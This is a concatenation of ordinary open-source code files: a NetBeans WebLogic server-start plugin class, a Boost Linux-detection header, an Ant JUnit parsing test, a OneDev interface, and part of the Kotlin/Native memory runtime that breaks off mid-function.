public final class WLStartServer extends StartServer {

    private static final String JAVA_VENDOR_VARIABLE = "JAVA_VENDOR"; // NOI18N

    private static final String JAVA_OPTIONS_VARIABLE = "JAVA_OPTIONS"; // NOI18N

    private static final String MEMORY_OPTIONS_VARIABLE = "USER_MEM_ARGS"; // NOI18N

    private static final Logger LOGGER = Logger.getLogger(WLStartServer.class.getName());

    // URIs of server instances that were last started in debug mode.
    /* GuardedBy(WLStartServer.class) */
    private static Set<String> SERVERS_IN_DEBUG;

    private final WLDeploymentManager dm;

    public WLStartServer(WLDeploymentManager dm) {
        this.dm = dm;
    }

    @Override
    public ServerDebugInfo getDebugInfo(Target target) {
        return new ServerDebugInfo(dm.getHost(), Integer.valueOf(
                dm.getInstanceProperties().getProperty(
                        WLPluginProperties.DEBUGGER_PORT_ATTR)));
    }

    @Override
    public boolean isAlsoTargetServer(Target target) {
        return true;
    }

    @Override
    public boolean isDebuggable(Target target) {
        // local servers are only debuggable when we started them in debug mode
        if (!dm.isRemote() && !isServerInDebug(dm.getUri())) {
            return false;
        }
        if (!isRunning()) {
            return false;
        }
        // XXX remote servers rely on the user-configured flag
        return !dm.isRemote()
                || Boolean.valueOf(dm.getInstanceProperties().getProperty(WLPluginProperties.REMOTE_DEBUG_ENABLED));
    }

    @Override
    public boolean isRunning() {
        WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
        return runtime.isRunning();
    }

    @Override
    public boolean needsStartForAdminConfig() {
        return true;
    }

    @Override
    public boolean needsStartForConfigure() {
        return false;
    }

    @Override
    public boolean needsStartForTargetList() {
        return true;
    }

    @Override
    public ProgressObject startDebugging(Target target) {
        LOGGER.log(Level.FINER, "Starting server in debug mode"); // NOI18N

        WLServerProgress serverProgress = new WLServerProgress(this);
        String serverName = dm.getInstanceProperties().getProperty(
                InstanceProperties.DISPLAY_NAME_ATTR);

        String uri = dm.getUri();
        WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
        runtime.start(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
                new StartListener(dm, serverName, serverProgress), getStartDebugVariables(dm), null);

        addServerInDebug(uri);
        return serverProgress;
    }

    @Override
    public ProgressObject startDeploymentManager() {
        LOGGER.log(Level.FINER, "Starting server"); // NOI18N

        WLServerProgress serverProgress = new WLServerProgress(this);
        String serverName = dm.getInstanceProperties().getProperty(
                InstanceProperties.DISPLAY_NAME_ATTR);

        String uri = dm.getUri();
        WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
        runtime.start(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
                new StartListener(dm, serverName, serverProgress), getStartVariables(dm), null);

        removeServerInDebug(uri);
        return serverProgress;
    }

    /* (non-Javadoc)
     * @see org.netbeans.modules.j2ee.deployment.plugins.spi.StartServer#startProfiling(javax.enterprise.deploy.spi.Target, org.netbeans.modules.j2ee.deployment.profiler.api.ProfilerServerSettings)
     */
    @Override
    public ProgressObject startProfiling(Target target) {
        LOGGER.log(Level.FINER, "Starting server in profiling mode"); // NOI18N

        final WLServerProgress serverProgress = new WLServerProgress(this);
        final String serverName = dm.getInstanceProperties().getProperty(
                InstanceProperties.DISPLAY_NAME_ATTR);

        String uri = dm.getUri();
        final WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
        runtime.start(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
                new StartListener(dm, serverName, serverProgress) {

            @Override
            public void onExit() {
                // if the profiler never attached, report the start as failed
                // and kill the server process
                int state = ProfilerSupport.getState();
                if (state == ProfilerSupport.STATE_INACTIVE) {
                    serverProgress.notifyStart(StateType.FAILED,
                            NbBundle.getMessage(WLStartServer.class,
                                    "MSG_START_PROFILED_SERVER_FAILED", serverName));
                    runtime.kill();
                }
            }
        }, getStartProfileVariables(dm), new WebLogicRuntime.RunningCondition() {

            @Override
            public boolean isRunning() {
                // consider the server "running" once the profiler agent is active
                int state = ProfilerSupport.getState();
                return state == ProfilerSupport.STATE_BLOCKING
                        || state == ProfilerSupport.STATE_RUNNING
                        || state == ProfilerSupport.STATE_PROFILING;
            }
        });

        removeServerInDebug(uri);
        return serverProgress;
    }

    @Override
    public ProgressObject stopDeploymentManager() {
        LOGGER.log(Level.FINER, "Stopping server"); // NOI18N

        WLServerProgress serverProgress = new WLServerProgress(this);
        String serverName = dm.getInstanceProperties().getProperty(
                InstanceProperties.DISPLAY_NAME_ATTR);

        String uri = dm.getUri();
        WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
        runtime.stop(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
                new StopListener(dm, serverName, serverProgress));

        removeServerInDebug(uri);
        return serverProgress;
    }

    @Override
    public boolean supportsStartDeploymentManager() {
        return !dm.isRemote();
    }

    @Override
    public boolean supportsStartProfiling( Target target ) {
        return !dm.isRemote();
    }

    @Override
    public boolean supportsStartDebugging(Target target) {
        //if we can start it we can debug it
        return supportsStartDeploymentManager();
    }

    @Override
    public boolean needsRestart(Target target) {
        return dm.isRestartNeeded();
    }

    private static synchronized void addServerInDebug(String uri) {
        if (SERVERS_IN_DEBUG == null) {
            SERVERS_IN_DEBUG = new HashSet<String>(1);
        }
        SERVERS_IN_DEBUG.add(uri);
    }

    private static synchronized void removeServerInDebug(String uri) {
        if (SERVERS_IN_DEBUG == null) {
            return;
        }
        SERVERS_IN_DEBUG.remove(uri);
    }

    private static synchronized boolean isServerInDebug(String uri) {
        return SERVERS_IN_DEBUG != null && SERVERS_IN_DEBUG.contains(uri);
    }

    // Environment variables for a plain (normal mode) server start.
    private static Map<String, String> getStartVariables(WLDeploymentManager dm) {
        Map<String, String> ret = new HashMap<String, String>();

        String javaOpts = dm.getInstanceProperties().getProperty(WLPluginProperties.JAVA_OPTS);
        StringBuilder sb = new StringBuilder((javaOpts != null && javaOpts.trim().length() > 0)
                ? javaOpts.trim() : "");
        for (StartupExtender args : StartupExtender.getExtenders(
                Lookups.singleton(CommonServerBridge.getCommonInstance(dm.getUri())), StartupExtender.StartMode.NORMAL)) {
            for (String singleArg : args.getArguments()) {
                sb.append(' ').append(singleArg);
            }
        }
        configureProxy(dm.getInstanceProperties(), ret, sb);
        if (sb.length() > 0) {
            ret.put(JAVA_OPTIONS_VARIABLE, sb.toString());
        }

        String vendor = dm.getInstanceProperties().getProperty(WLPluginProperties.VENDOR);
        if (vendor != null && vendor.trim().length() > 0) {
            ret.put(JAVA_VENDOR_VARIABLE, vendor.trim());
        }

        String memoryOptions = dm.getInstanceProperties().getProperty(
                WLPluginProperties.MEM_OPTS);
        if (memoryOptions != null && memoryOptions.trim().length() > 0) {
            ret.put(MEMORY_OPTIONS_VARIABLE, memoryOptions.trim());
        }
        return ret;
    }

    // Environment variables for a debug-mode start: normal options plus
    // the JDWP agent listening on the configured debugger port.
    private static Map<String, String> getStartDebugVariables(WLDeploymentManager dm) {
        Map<String, String> ret = new HashMap<String, String>();

        int debugPort = Integer.parseInt(dm.getInstanceProperties().getProperty(
                WLPluginProperties.DEBUGGER_PORT_ATTR));

        StringBuilder javaOptsBuilder = new StringBuilder();
        String javaOpts = dm.getInstanceProperties().getProperty(
                WLPluginProperties.JAVA_OPTS);
        if (javaOpts != null && javaOpts.trim().length() > 0) {
            javaOptsBuilder.append(javaOpts.trim());
        }
        if (javaOptsBuilder.length() > 0) {
            javaOptsBuilder.append(" ");// NOI18N
        }
        javaOptsBuilder.append("-agentlib:jdwp=server=y,suspend=n,transport=dt_socket,address="); // NOI18N
        javaOptsBuilder.append(debugPort);
        for (StartupExtender args : StartupExtender.getExtenders(
                Lookups.singleton(CommonServerBridge.getCommonInstance(dm.getUri())), StartupExtender.StartMode.DEBUG)) {
            for (String singleArg : args.getArguments()) {
                javaOptsBuilder.append(' ').append(singleArg);
            }
        }
        configureProxy(dm.getInstanceProperties(), ret, javaOptsBuilder);
        if (javaOptsBuilder.length() > 0) {
            ret.put(JAVA_OPTIONS_VARIABLE, javaOptsBuilder.toString());
        }

        String memoryOptions = dm.getInstanceProperties().getProperty(
                WLPluginProperties.MEM_OPTS);
        if (memoryOptions != null && memoryOptions.trim().length() > 0) {
            ret.put(MEMORY_OPTIONS_VARIABLE, memoryOptions.trim());
        }
        return ret;
    }

    // Environment variables for a profiling start; profiler agent options
    // are contributed through the PROFILE startup extenders.
    private static Map<String, String> getStartProfileVariables(WLDeploymentManager dm) {
        Map<String, String> ret = new HashMap<String, String>();

        StringBuilder javaOptsBuilder = new StringBuilder();
        String javaOpts = dm.getInstanceProperties().getProperty(
                WLPluginProperties.JAVA_OPTS);
        if (javaOpts != null && javaOpts.trim().length() > 0) {
            javaOptsBuilder.append(" "); // NOI18N
            javaOptsBuilder.append(javaOpts.trim());
        }
        for (StartupExtender args : StartupExtender.getExtenders(
                Lookups.singleton(CommonServerBridge.getCommonInstance(dm.getUri())), StartupExtender.StartMode.PROFILE)) {
            for (String singleArg : args.getArguments()) {
                javaOptsBuilder.append(' ').append(singleArg);
            }
        }
        configureProxy(dm.getInstanceProperties(), ret, javaOptsBuilder);

        String toAdd = javaOptsBuilder.toString().trim();
        if (!toAdd.isEmpty()) {
            ret.put(JAVA_OPTIONS_VARIABLE, toAdd);
        }
        return ret;
    }

    // Either propagate the IDE proxy settings into the java options, or
    // explicitly clear http_proxy in the environment when disabled.
    private static void configureProxy(InstanceProperties props, Map<String, String> env, StringBuilder javaOpts) {
        if (Boolean.valueOf(props.getProperty(WLPluginProperties.PROXY_ENABLED))) {
            configureProxy(javaOpts);
        } else {
            env.put("http_proxy", ""); // NOI18N
        }
    }

    // Append -Dhttp(s).proxyHost/Port system properties (taken from the IDE
    // process) unless the options already mention them.
    private static StringBuilder configureProxy(StringBuilder sb) {
        final String[] PROXY_PROPS = {
            "http.proxyHost", // NOI18N
            "http.proxyPort", // NOI18N
            "https.proxyHost", // NOI18N
            "https.proxyPort", // NOI18N
        };

        for (String prop : PROXY_PROPS) {
            if (sb.indexOf(prop) < 0) {
                String value = System.getProperty(prop);
                if (value != null) {
                    if (sb.length() > 0) {
                        sb.append(' '); // NOI18N
                    }
                    sb.append(" -D").append(prop).append("=").append(value); // NOI18N
                }
            }
        }

        appendNonProxyHosts(sb);
        return sb;
    }

    // Append -Dhttp.nonProxyHosts unless already present.
    private static StringBuilder appendNonProxyHosts(StringBuilder sb) {
        if (sb.indexOf(NonProxyHostsHelper.HTTP_NON_PROXY_HOSTS) < 0) { // NOI18N
            String nonProxyHosts = NonProxyHostsHelper.getNonProxyHosts();
            if (!nonProxyHosts.isEmpty()) {
                if (sb.length() > 0) {
                    sb.append(' '); // NOI18N
                }
                sb.append("-D"); // NOI18N
                sb.append(NonProxyHostsHelper.HTTP_NON_PROXY_HOSTS);
                sb.append("="); // NOI18N
                sb.append('"').append(nonProxyHosts).append('"'); // NOI18N
            }
        }
        return sb;
    }

    // Routes server process output/error streams to the server's IO tab.
    private static class DefaultInputProcessorFactory implements BaseExecutionDescriptor.InputProcessorFactory {

        private final String uri;

        private final boolean error;

        public DefaultInputProcessorFactory(String uri, boolean error) {
            this.uri = uri;
            this.error = error;
        }

        @Override
        public InputProcessor newInputProcessor() {
            InputOutput io = UISupport.getServerIO(uri);
            if (io == null) {
                return null;
            }
            return org.netbeans.api.extexecution.print.InputProcessors.printing(
                    error ? io.getErr() : io.getOut(), new ErrorLineConvertor(), true);
        }
    }

    // Translates runtime start events into WLServerProgress notifications.
    private static class StartListener implements RuntimeListener {

        private final WLDeploymentManager dm;

        private final String serverName;

        private final WLServerProgress serverProgress;

        public StartListener(WLDeploymentManager dm, String serverName, WLServerProgress serverProgress) {
            this.dm = dm;
            this.serverName = serverName;
            this.serverProgress = serverProgress;
        }

        @Override
        public void onStart() {
            serverProgress.notifyStart(StateType.RUNNING,
                    NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_IN_PROGRESS", serverName));
        }

        @Override
        public void onFinish() {
            // noop
        }

        @Override
        public void onFail() {
            serverProgress.notifyStart(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_FAILED", serverName));
        }

        @Override
        public void onProcessStart() {
            InputOutput io = UISupport.getServerIO(dm.getUri());
            if (io == null) {
                return;
            }

            dm.getLogManager().stop();

            try {
                // as described in the api we reset just ouptut
                io.getOut().reset();
            } catch (IOException ex) {
                LOGGER.log(Level.INFO, null, ex);
            }

            io.select();
        }

        @Override
        public void onProcessFinish() {
            InputOutput io = UISupport.getServerIO(dm.getUri());
            if (io != null) {
                io.getOut().close();
                io.getErr().close();
            }
        }

        @Override
        public void onRunning() {
            dm.setRestartNeeded(false);
            serverProgress.notifyStart(StateType.COMPLETED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_SERVER_STARTED", serverName));
        }

        @Override
        public void onTimeout() {
            serverProgress.notifyStart(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_TIMEOUT"));
        }

        @Override
        public void onInterrupted() {
            serverProgress.notifyStart(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_INTERRUPTED"));
        }

        @Override
        public void onException(Exception ex) {
            LOGGER.log(Level.WARNING, null, ex);
            serverProgress.notifyStart(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_FAILED", serverName));
        }

        @Override
        public void onExit() {
            // noop
        }
    }

    // Translates runtime stop events into WLServerProgress notifications.
    private static class StopListener implements RuntimeListener {

        private final WLDeploymentManager dm;

        private final String serverName;

        private final WLServerProgress serverProgress;

        public StopListener(WLDeploymentManager dm, String serverName, WLServerProgress serverProgress) {
            this.dm = dm;
            this.serverName = serverName;
            this.serverProgress = serverProgress;
        }

        @Override
        public void onStart() {
            serverProgress.notifyStop(StateType.RUNNING,
                    NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_IN_PROGRESS", serverName));
        }

        @Override
        public void onFinish() {
            serverProgress.notifyStop(StateType.COMPLETED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_SERVER_STOPPED", serverName));
        }

        @Override
        public void onFail() {
            serverProgress.notifyStop(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_FAILED", serverName));
        }

        @Override
        public void onProcessStart() {
            InputOutput io = UISupport.getServerIO(dm.getUri());
            if (io == null) {
                return;
            }

            dm.getLogManager().stop();

            try {
                // as described in the api we reset just ouptut
                io.getOut().reset();
            } catch (IOException ex) {
                LOGGER.log(Level.INFO, null, ex);
            }

            io.select();
        }

        @Override
        public void onProcessFinish() {
            InputOutput io = UISupport.getServerIO(dm.getUri());
            if (io != null) {
                io.getOut().close();
                io.getErr().close();
            }
        }

        @Override
        public void onRunning() {
            serverProgress.notifyStop(StateType.RUNNING,
                    NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_IN_PROGRESS", serverName));
        }

        @Override
        public void onTimeout() {
            serverProgress.notifyStop(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_TIMEOUT"));
        }

        @Override
        public void onInterrupted() {
            // fixed: this is a stop operation, so report through notifyStop
            // (previously called notifyStart by copy-paste mistake)
            serverProgress.notifyStop(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_INTERRUPTED"));
        }

        @Override
        public void onException(Exception ex) {
            LOGGER.log(Level.WARNING, null, ex);
            // fixed: report the stop failure through notifyStop
            serverProgress.notifyStop(StateType.FAILED,
                    NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_FAILED", serverName));
        }

        @Override
        public void onExit() {
            // noop
        }
    }
}
| 9,538 |
17,104 | /*
Copyright <NAME> 2008-2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
#ifndef BOOST_PREDEF_OS_LINUX_H
#define BOOST_PREDEF_OS_LINUX_H

#include <boost/predef/version_number.h>
#include <boost/predef/make.h>

/*`
[heading `BOOST_OS_LINUX`]

[@http://en.wikipedia.org/wiki/Linux Linux] operating system.

[table
    [[__predef_symbol__] [__predef_version__]]

    [[`linux`] [__predef_detection__]]
    [[`__linux`] [__predef_detection__]]
    ]
 */

// Default: not detected.
#define BOOST_OS_LINUX BOOST_VERSION_NUMBER_NOT_AVAILABLE

// Only detect when no other OS has been detected yet (predef detects
// exactly one OS per translation unit).
#if !defined(BOOST_PREDEF_DETAIL_OS_DETECTED) && ( \
    defined(linux) || defined(__linux) \
    )
# undef BOOST_OS_LINUX
# define BOOST_OS_LINUX BOOST_VERSION_NUMBER_AVAILABLE
#endif

#if BOOST_OS_LINUX
# define BOOST_OS_LINUX_AVAILABLE
# include <boost/predef/detail/os_detected.h>
#endif

#define BOOST_OS_LINUX_NAME "Linux"

#endif

// Intentionally outside the include guard (Boost.Predef convention):
// the test declaration is processed on every include.
#include <boost/predef/detail/test.h>

BOOST_PREDEF_DECLARE_TEST(BOOST_OS_LINUX,BOOST_OS_LINUX_NAME)
364 | <gh_stars>100-1000
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package org.apache.tools.ant.taskdefs.optional.junit;
import static org.junit.Assert.assertArrayEquals;
import org.junit.Test;
import org.junit.experimental.runners.Enclosed;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.junit.runners.Parameterized.Parameter;
import org.junit.runners.Parameterized.Parameters;
import java.util.Arrays;
import java.util.Collection;
/**
*
* @author <NAME>
*/
@RunWith(Enclosed.class)
public class BatchTestTest {

    // Each string should be rejected by JUnitTest.parseTestMethodNamesList:
    // empty items, dangling commas/whitespace, or illegal Java identifiers.
    @RunWith(Parameterized.class)
    public static class IllegalArgumentTest {

        // requires JUnit 4.12
        @Parameters(name = "illegal argument: |{0}|")
        public static Collection<String> data() {
            return Arrays.asList(null, ",", " ,", ", ", " , ",
                ",a", " ,a", " ,a", " , a", " ,a ", " ,a ,",
                "ab,,cd", "ab, ,cd", "ab, ,cd", "ab, ,cd,", ",ab, ,cd,",
                /* illegal Java identifiers: */
                "1", "1a", "1ab", "1abc", "1abc d", "1abc de", "1abc def", "1abc def,",
                ",1abc def");
        }

        @Parameter
        public String argument;

        /**
         * Expected failure when the parameter is illegal
         */
        @Test(expected = IllegalArgumentException.class)
        public void testParseTestMethodNamesList() {
            JUnitTest.parseTestMethodNamesList(argument);
        }
    }

    // Each {input, expected-array} pair: parsing must trim whitespace,
    // ignore a trailing comma, and accept any legal Java identifier.
    @RunWith(Parameterized.class)
    public static class LegalArgumentTest {

        @Parameters(name = "legal argument: |{0}|")
        public static Collection<Object[]> data() {
            return Arrays.asList(new Object[][] {
                {"", new String[0]}, {" ", new String[0]}, {"  ", new String[0]},
                {"abc", new String[]{"abc"}}, {"abc ", new String[]{"abc"}},
                {" abc", new String[]{"abc"}}, {" abc ", new String[]{"abc"}},
                {"abc  ", new String[]{"abc"}}, {"abc,", new String[]{"abc"}},
                {"abc, ", new String[]{"abc"}}, {"abc ,", new String[]{"abc"}},
                {"abc , ", new String[]{"abc"}}, {" abc ,", new String[]{"abc"}},
                /* legal Java identifiers: */
                {"a", new String[]{"a"}}, {"a1", new String[]{"a1"}},
                {"a$", new String[]{"a$"}}, {"a$1", new String[]{"a$1"}},
                {"_bc", new String[]{"_bc"}}, {"___", new String[]{"___"}},
                {"abc,def", new String[]{"abc", "def"}},
                {"abc,def,", new String[]{"abc", "def"}},
                {"abc,def ", new String[]{"abc", "def"}},
                {"abc, def", new String[]{"abc", "def"}},
                {"abc, def ", new String[]{"abc", "def"}},
                {"abc ,def", new String[]{"abc", "def"}},
                {"abc ,def ", new String[]{"abc", "def"}},
                {"abc , def", new String[]{"abc", "def"}},
                {"abc , def ", new String[]{"abc", "def"}},
                {" abc,def", new String[]{"abc", "def"}},
                {" abc,def ", new String[]{"abc", "def"}},
                {" abc, def", new String[]{"abc", "def"}},
                {" abc, def ", new String[]{"abc", "def"}},
                {" abc ,def", new String[]{"abc", "def"}},
                {" abc ,def ", new String[]{"abc", "def"}},
                {" abc , def", new String[]{"abc", "def"}},
                {" abc , def ", new String[]{"abc", "def"}},
                {" abc , def ,", new String[]{"abc", "def"}},
            });
        }

        @Parameter
        public String argument;

        @Parameter(1)
        public String[] result;

        @Test
        public void testParseTestMethodNamesList() {
            assertArrayEquals(result, JUnitTest.parseTestMethodNamesList(argument));
        }
    }
}
| 2,137 |
7,137 | package io.onedev.server.entitymanager;
import java.util.List;
import java.util.Map;
import io.onedev.server.model.Agent;
import io.onedev.server.model.AgentAttribute;
import io.onedev.server.persistence.dao.EntityManager;
public interface AgentAttributeManager extends EntityManager<AgentAttribute> {

    // Names of all attributes currently known across agents.
    List<String> getAttributeNames();

    // Make the agent's stored attributes match attributeMap
    // (presumably adding/updating/removing as needed — confirm with impl).
    void syncAttributes(Agent agent, Map<String, String> attributeMap);

}
| 124 |
45,293 | <gh_stars>1000+
/*
* Copyright 2010-2020 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license
* that can be found in the LICENSE file.
*/
#include "Memory.h"
#include "MemoryPrivate.hpp"
#include "Exceptions.h"
#include "ExtraObjectData.hpp"
#include "Freezing.hpp"
#include "GC.hpp"
#include "GlobalsRegistry.hpp"
#include "InitializationScheme.hpp"
#include "KAssert.h"
#include "Natives.h"
#include "ObjectOps.hpp"
#include "Porting.h"
#include "Runtime.h"
#include "StableRefRegistry.hpp"
#include "ThreadData.hpp"
#include "ThreadRegistry.hpp"
#include "ThreadState.hpp"
#include "Utils.hpp"
using namespace kotlin;
// TODO: This name does not make sense anymore.
// Delete all means of creating this type directly as it only serves
// as a typedef for `mm::StableRefRegistry::Node`.
// Opaque handle type exposed through the foreign-ref C API; it is never
// instantiated (both special members are deleted) and only ever produced by
// reinterpret_cast from a registry node.
class ForeignRefManager : Pinned {
public:
    ForeignRefManager() = delete;
    ~ForeignRefManager() = delete;
};

namespace {

// `reinterpret_cast` to it and back to the same type
// will yield precisely the same pointer, so it's safe.
ALWAYS_INLINE ForeignRefManager* ToForeignRefManager(mm::StableRefRegistry::Node* data) {
    return reinterpret_cast<ForeignRefManager*>(data);
}

ALWAYS_INLINE mm::StableRefRegistry::Node* FromForeignRefManager(ForeignRefManager* manager) {
    return reinterpret_cast<mm::StableRefRegistry::Node*>(manager);
}

} // namespace
ObjHeader** ObjHeader::GetWeakCounterLocation() {
return mm::ExtraObjectData::FromMetaObjHeader(this->meta_object()).GetWeakCounterLocation();
}
#ifdef KONAN_OBJC_INTEROP
void* ObjHeader::GetAssociatedObject() {
if (!has_meta_object()) {
return nullptr;
}
return *GetAssociatedObjectLocation();
}
void** ObjHeader::GetAssociatedObjectLocation() {
return mm::ExtraObjectData::FromMetaObjHeader(this->meta_object()).GetAssociatedObjectLocation();
}
void ObjHeader::SetAssociatedObject(void* obj) {
*GetAssociatedObjectLocation() = obj;
}
#endif // KONAN_OBJC_INTEROP
// static
MetaObjHeader* ObjHeader::createMetaObject(ObjHeader* object) {
return mm::ExtraObjectData::Install(object).AsMetaObjHeader();
}
// static
void ObjHeader::destroyMetaObject(ObjHeader* object) {
mm::ExtraObjectData::Uninstall(object);
}
ALWAYS_INLINE bool isPermanentOrFrozen(const ObjHeader* obj) {
// TODO: Freeze TF_IMMUTABLE objects upon creation.
return mm::IsFrozen(obj) || ((obj->type_info()->flags_ & TF_IMMUTABLE) != 0);
}
ALWAYS_INLINE bool isShareable(const ObjHeader* obj) {
// TODO: Remove when legacy MM is gone.
return true;
}
extern "C" MemoryState* InitMemory(bool firstRuntime) {
return mm::ToMemoryState(mm::ThreadRegistry::Instance().RegisterCurrentThread());
}
// Deinitializes the calling thread's memory subsystem and unregisters the
// thread. When `destroyRuntime` is set, a final full GC is run first
// (temporarily switching to the runnable state just for that).
extern "C" void DeinitMemory(MemoryState* state, bool destroyRuntime) {
    // We need the native state to avoid a deadlock on unregistering the thread.
    // The deadlock is possible if we are in the runnable state and the GC already locked
    // the thread registry and waits for threads to suspend or go to the native state.
    AssertThreadState(state, ThreadState::kNative);
    auto* node = mm::FromMemoryState(state);
    if (destroyRuntime) {
        ThreadStateGuard guard(state, ThreadState::kRunnable);
        node->Get()->gc().PerformFullGC();
        // TODO: Also make sure that finalizers are run.
    }
    mm::ThreadRegistry::Instance().Unregister(node);
    if (destroyRuntime) {
        mm::ThreadRegistry::ClearCurrentThreadData();
    }
}
// Legacy-MM compatibility stub; the new MM keeps no state to restore.
extern "C" void RestoreMemory(MemoryState*) {
    // TODO: Remove when legacy MM is gone.
}

// Test-only hook: drops all per-thread state accumulated so far.
extern "C" void ClearMemoryForTests(MemoryState* state) {
    state->GetThreadData()->ClearForTests();
}
// Allocates a plain object of `typeInfo` on behalf of the current thread.
extern "C" RUNTIME_NOTHROW OBJ_GETTER(AllocInstance, const TypeInfo* typeInfo) {
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    RETURN_RESULT_OF(mm::AllocateObject, threadData, typeInfo);
}

// Allocates an array with `elements` items; a negative size raises
// IllegalArgumentException before any allocation happens.
extern "C" OBJ_GETTER(AllocArrayInstance, const TypeInfo* typeInfo, int32_t elements) {
    if (elements < 0) {
        ThrowIllegalArgumentException();
    }
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    RETURN_RESULT_OF(mm::AllocateArray, threadData, typeInfo, static_cast<uint32_t>(elements));
}

// Lazily initializes a thread-local singleton stored at `location`.
extern "C" ALWAYS_INLINE OBJ_GETTER(InitThreadLocalSingleton, ObjHeader** location, const TypeInfo* typeInfo, void (*ctor)(ObjHeader*)) {
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    RETURN_RESULT_OF(mm::InitThreadLocalSingleton, threadData, location, typeInfo, ctor);
}

// Lazily initializes a shared (global) singleton stored at `location`.
extern "C" ALWAYS_INLINE OBJ_GETTER(InitSingleton, ObjHeader** location, const TypeInfo* typeInfo, void (*ctor)(ObjHeader*)) {
    auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
    RETURN_RESULT_OF(mm::InitSingleton, threadData, location, typeInfo, ctor);
}
extern "C" RUNTIME_NOTHROW void InitAndRegisterGlobal(ObjHeader** location, const ObjHeader* initialValue) {
auto* threadData = mm::ThreadRegistry::Instance().CurrentThreadData();
AssertThreadState(threadData, ThreadState::kRunnable);
mm::GlobalsRegistry::Instance().RegisterStorageForGlobal(threadData, location);
// Null `initialValue` means that the appropriate value was already set by static initialization.
if (initialValue != nullptr) {
mm::SetHeapRef(location, const_cast<ObjHeader*>(initialValue));
}
}
extern "C" const MemoryModel CurrentMemoryModel = MemoryModel::kExperimental;
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void SetStackRef(ObjHeader** location, const ObjHeader* object) {
mm::SetStackRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void SetHeapRef(ObjHeader** location, const ObjHeader* object) {
mm::SetHeapRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void ZeroHeapRef(ObjHeader** location) {
mm::SetHeapRef(location, nullptr);
}
extern "C" RUNTIME_NOTHROW void ZeroArrayRefs(ArrayHeader* array) {
for (uint32_t index = 0; index < array->count_; ++index) {
ObjHeader** location = ArrayAddressOfElementAt(array, index);
mm::SetHeapRef(location, nullptr);
}
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void ZeroStackRef(ObjHeader** location) {
mm::SetStackRef(location, nullptr);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateStackRef(ObjHeader** location, const ObjHeader* object) {
mm::SetStackRef(location, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateHeapRef(ObjHeader** location, const ObjHeader* object) {
mm::SetHeapRef(location, const_cast<ObjHeader*>(object));
}
// Atomically stores `object` into `location` only when the slot still holds
// null (compare-and-swap); a null `object` is a no-op.
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateHeapRefIfNull(ObjHeader** location, const ObjHeader* object) {
    if (object == nullptr) return;
    ObjHeader* result = nullptr; // No need to store this value in a rootset.
    mm::CompareAndSwapHeapRef(location, nullptr, const_cast<ObjHeader*>(object), &result);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateHeapRefsInsideOneArray(const ArrayHeader* array, int fromIndex,
int toIndex, int count) {
RuntimeFail("Only for legacy MM");
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void UpdateReturnRef(ObjHeader** returnSlot, const ObjHeader* object) {
mm::SetStackRef(returnSlot, const_cast<ObjHeader*>(object));
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW OBJ_GETTER(
SwapHeapRefLocked, ObjHeader** location, ObjHeader* expectedValue, ObjHeader* newValue, int32_t* spinlock, int32_t* cookie) {
RETURN_RESULT_OF(mm::CompareAndSwapHeapRef, location, expectedValue, newValue);
}
extern "C" ALWAYS_INLINE RUNTIME_NOTHROW void SetHeapRefLocked(
